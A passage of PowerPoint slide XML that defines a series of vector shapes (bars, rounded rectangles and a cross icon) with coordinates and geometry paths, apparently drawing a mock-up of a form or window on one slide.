              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66012" h="8606" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="8606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="8606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="1"/>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45" name="Google Shape;1357;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437E2FBC-6D02-82F9-429D-7BB462F0C2FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6964692" y="2445056"/>
              <a:ext cx="1301592" cy="24331"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66012" h="1234" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="1234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="1"/>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46" name="Google Shape;1358;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E6F711-5DE3-C291-D299-98C4B9069AD6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7006533" y="2317247"/>
              <a:ext cx="57634" cy="11278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="572" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="298" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="1"/>
                    <a:pt x="1" y="138"/>
                    <a:pt x="1" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="457"/>
                    <a:pt x="138" y="571"/>
                    <a:pt x="298" y="571"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2626" y="571"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2786" y="571"/>
                    <a:pt x="2923" y="457"/>
                    <a:pt x="2923" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2923" y="138"/>
                    <a:pt x="2786" y="1"/>
                    <a:pt x="2626"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47" name="Google Shape;1359;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13C875A6-9099-08D5-298E-43F61825BC06}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7099264" y="2317247"/>
              <a:ext cx="57161" cy="11278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2899" h="572" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="274" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="1"/>
                    <a:pt x="0" y="138"/>
                    <a:pt x="0" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="457"/>
                    <a:pt x="114" y="571"/>
                    <a:pt x="274" y="571"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2625" y="571"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="571"/>
                    <a:pt x="2899" y="457"/>
                    <a:pt x="2899" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2899" y="138"/>
                    <a:pt x="2785" y="1"/>
                    <a:pt x="2625"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48" name="Google Shape;1360;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1FB4AB6-2DBA-0ADA-8F9A-CD847EB4283D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7006533" y="2299245"/>
              <a:ext cx="57634" cy="29280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="1485" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2352" y="571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2352" y="914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="571"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="298" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="1"/>
                    <a:pt x="1" y="138"/>
                    <a:pt x="1" y="297"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="1210"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1370"/>
                    <a:pt x="138" y="1484"/>
                    <a:pt x="298" y="1484"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2626" y="1484"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2786" y="1484"/>
                    <a:pt x="2923" y="1370"/>
                    <a:pt x="2923" y="1210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2923" y="297"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2923" y="138"/>
                    <a:pt x="2786" y="1"/>
                    <a:pt x="2626"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49" name="Google Shape;1361;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F18A9A-EBAB-70AA-156F-C7159FD7EC3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7058291" y="2363603"/>
              <a:ext cx="462691" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="23466" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23465" y="1690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23465" y="1"/>
                  </a:ln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50" name="Google Shape;1362;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E09BC3D5-BDDB-6296-E91F-B62D30A4773F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6964692" y="2504031"/>
              <a:ext cx="1301592" cy="169235"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66012" h="8583" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="8582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="8582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="0"/>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51" name="Google Shape;1363;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA6DBC90-6D5B-D903-768A-ED23399F430E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6964692" y="2673246"/>
              <a:ext cx="1301592" cy="24765"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66012" h="1256" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="1256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="0"/>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52" name="Google Shape;1364;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08D22EE1-2206-4C03-EA28-B7671AE37D01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7006533" y="2545871"/>
              <a:ext cx="57634" cy="11278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="572" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="298" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="1"/>
                    <a:pt x="1" y="115"/>
                    <a:pt x="1" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="435"/>
                    <a:pt x="138" y="571"/>
                    <a:pt x="298" y="571"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2626" y="571"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2786" y="571"/>
                    <a:pt x="2923" y="435"/>
                    <a:pt x="2923" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2923" y="115"/>
                    <a:pt x="2786" y="1"/>
                    <a:pt x="2626"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53" name="Google Shape;1365;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{542B6593-1FDE-B806-ED72-1E5DF8DFD669}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7099264" y="2545871"/>
              <a:ext cx="57161" cy="11278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2899" h="572" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="274" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="1"/>
                    <a:pt x="0" y="115"/>
                    <a:pt x="0" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="435"/>
                    <a:pt x="114" y="571"/>
                    <a:pt x="274" y="571"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2625" y="571"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="571"/>
                    <a:pt x="2899" y="435"/>
                    <a:pt x="2899" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2899" y="115"/>
                    <a:pt x="2785" y="1"/>
                    <a:pt x="2625"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54" name="Google Shape;1366;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8FA3CDA-32DE-9194-EA05-7E74E3E6E7AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7006533" y="2527869"/>
              <a:ext cx="57634" cy="29280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="1485" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2352" y="571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2352" y="914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="571"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="298" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="1"/>
                    <a:pt x="1" y="138"/>
                    <a:pt x="1" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="1188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1348"/>
                    <a:pt x="138" y="1484"/>
                    <a:pt x="298" y="1484"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2626" y="1484"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2786" y="1484"/>
                    <a:pt x="2923" y="1348"/>
                    <a:pt x="2923" y="1188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2923" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2923" y="138"/>
                    <a:pt x="2786" y="1"/>
                    <a:pt x="2626"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55" name="Google Shape;1367;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E33DB0FC-ABE1-A3A9-964F-DB62464CFFFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7058291" y="2591793"/>
              <a:ext cx="324077" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="16436" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16435" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16435" y="0"/>
                  </a:ln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56" name="Google Shape;1368;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{097657AE-B7C9-8CA9-4EA9-3BFF3404906A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7419694" y="2591793"/>
              <a:ext cx="545485" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="27665" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27665" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27665"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57" name="Google Shape;1369;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FBD5189-EA5C-019C-D5C8-D40E55DC4DF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8006113" y="2591793"/>
              <a:ext cx="89596" cy="33323"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4544" h="1690" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543"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58" name="Google Shape;1370;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2716D5D-BCB2-6D13-FE2A-262651A589DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6964692" y="2770454"/>
              <a:ext cx="1301592" cy="387074"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66012" h="19631" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="19630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="19630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="1"/>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59" name="Google Shape;1371;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC2B8569-F05F-C078-5829-FDED02BD2B3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6964692" y="3133196"/>
              <a:ext cx="1301592" cy="24331"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66012" h="1234" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="1233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66011" y="1"/>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60" name="Google Shape;1372;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9548C85-FF3A-0D00-A5A7-17864FFF34F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7006533" y="2812314"/>
              <a:ext cx="57634" cy="57634"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="2923" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2352" y="571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2352" y="2351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="2351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="571"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="298" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="0"/>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="2625"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2785"/>
                    <a:pt x="138" y="2922"/>
                    <a:pt x="298" y="2922"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2626" y="2922"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2786" y="2922"/>
                    <a:pt x="2923" y="2785"/>
                    <a:pt x="2923" y="2625"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2923" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2923" y="137"/>
                    <a:pt x="2786" y="0"/>
                    <a:pt x="2626"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61" name="Google Shape;1373;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D68C5F39-8648-8DC1-BFAC-CA6CDFD0BEA1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7099264" y="2858670"/>
              <a:ext cx="57161" cy="11278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2899" h="572" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="274" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="0"/>
                    <a:pt x="0" y="115"/>
                    <a:pt x="0" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="434"/>
                    <a:pt x="114" y="571"/>
                    <a:pt x="274" y="571"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2625" y="571"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="571"/>
                    <a:pt x="2899" y="434"/>
                    <a:pt x="2899" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2899" y="115"/>
                    <a:pt x="2785" y="0"/>
                    <a:pt x="2625"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62" name="Google Shape;1374;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{717F2C08-C063-9ED5-14C1-9A9DF60A8D32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7211319" y="2870362"/>
              <a:ext cx="187237" cy="187257"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9496" h="9497" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="9496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9496" y="9496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9496" y="1"/>
                  </a:ln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63" name="Google Shape;1375;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5D007B-A54A-0F24-B500-56E2EAC6884F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7252272" y="2912222"/>
              <a:ext cx="105331" cy="103537"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5342" h="5251" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="5022" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4948" y="1"/>
                    <a:pt x="4874" y="23"/>
                    <a:pt x="4817" y="69"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="4771"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="4885"/>
                    <a:pt x="1" y="5068"/>
                    <a:pt x="115" y="5182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="5228"/>
                    <a:pt x="252" y="5250"/>
                    <a:pt x="320" y="5250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="5250"/>
                    <a:pt x="480" y="5228"/>
                    <a:pt x="526" y="5182"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5228" y="480"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5342" y="366"/>
                    <a:pt x="5342" y="183"/>
                    <a:pt x="5228" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5171" y="23"/>
                    <a:pt x="5096" y="1"/>
                    <a:pt x="5022"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64" name="Google Shape;1376;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDDE0815-897F-B9DF-6D7D-6B7C73A4EC68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7252272" y="2912222"/>
              <a:ext cx="105331" cy="103537"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5342" h="5251" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="320" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="1"/>
                    <a:pt x="172" y="23"/>
                    <a:pt x="115" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="183"/>
                    <a:pt x="1" y="366"/>
                    <a:pt x="115" y="480"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4817" y="5182"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4885" y="5228"/>
                    <a:pt x="4954" y="5250"/>
                    <a:pt x="5022" y="5250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5091" y="5250"/>
                    <a:pt x="5159" y="5228"/>
                    <a:pt x="5228" y="5182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5342" y="5068"/>
                    <a:pt x="5342" y="4885"/>
                    <a:pt x="5228" y="4771"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="526" y="69"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="469" y="23"/>
                    <a:pt x="394" y="1"/>
                    <a:pt x="320"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65" name="Google Shape;1377;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3DA9D92-DDB6-81D1-5ECD-0FE8D24F9692}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
